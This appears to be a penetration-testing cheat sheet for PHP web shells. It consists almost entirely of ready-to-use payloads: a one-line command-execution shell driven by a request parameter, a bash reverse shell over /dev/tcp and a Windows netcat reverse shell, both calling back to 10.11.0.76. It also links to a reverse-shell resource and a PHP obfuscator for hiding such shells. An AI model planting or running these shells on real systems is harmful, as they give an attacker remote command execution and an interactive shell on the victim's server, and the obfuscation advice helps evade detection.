PHP Shells

Generic PHP shell

<?php echo system($_REQUEST['trick']); ?>

>>> then in the web browser (get request) append to file_name.php:

?trick=whoami

PHP Shells resource

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Generic bash reverse shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.11.0.76/9002 0>&1'"); ?>

Generic windows reverse shell

<?php exec("nc.exe 10.11.0.76 9001 -e cmd.exe"); ?>

Find all files that have changed in the last 60 seconds

<?php system('find /home -ctime -60') ?>

PHP Shell Obfuscator

https://www.gaijin.at/en/tools/php-obfuscator

Last updated 1 year ago